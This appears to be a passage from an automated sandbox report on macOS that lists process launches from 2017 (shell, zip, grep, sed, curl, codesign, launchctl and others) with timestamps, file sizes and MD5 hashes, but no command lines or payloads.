MD5 hash:ecb64579c6dd0ebee31bf8e4d4cdcc6e

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/rm
File size:23744 bytes
MD5 hash:e8926d2347850b76f57a1d5f0226de8b

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/cp
File size:28832 bytes
MD5 hash:a8ebcee2d17317beee2136ec59bfba4d

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mv
File size:24144 bytes
MD5 hash:7fb694b9a3c7fd27aa7fca81d5afdfeb

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mv
File size:24144 bytes
MD5 hash:7fb694b9a3c7fd27aa7fca81d5afdfeb

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mv
File size:24144 bytes
MD5 hash:7fb694b9a3c7fd27aa7fca81d5afdfeb

General

Start time:16:26:37
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:37
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:37
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:37
Start date:09/05/2017
Path:/usr/bin/curl
File size:172016 bytes
MD5 hash:313ae871e04221163541c8af134351dc

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/touch
File size:23248 bytes
MD5 hash:6e95af6ebd7fd2dd9a0e26654024db31

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/chmod
File size:33904 bytes
MD5 hash:ecb64579c6dd0ebee31bf8e4d4cdcc6e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/codesign
File size:98304 bytes
MD5 hash:08b2dc5c47c8081db031055901b32ccd

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/codesign
File size:98304 bytes
MD5 hash:08b2dc5c47c8081db031055901b32ccd

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/codesign_allocate
File size:18208 bytes
MD5 hash:c04b0c53dc3af4effd0731b9663a555d

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/libexec/DeveloperTools/codesign_allocate
File size:144384 bytes
MD5 hash:f0209b39eba8aa88c1e94bb653698641

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/rm
File size:23744 bytes
MD5 hash:e8926d2347850b76f57a1d5f0226de8b

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/launchctl
File size:124048 bytes
MD5 hash:dbfeff92b30d89c0a04dd0fbeb40ae5e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/rm
File size:23744 bytes
MD5 hash:e8926d2347850b76f57a1d5f0226de8b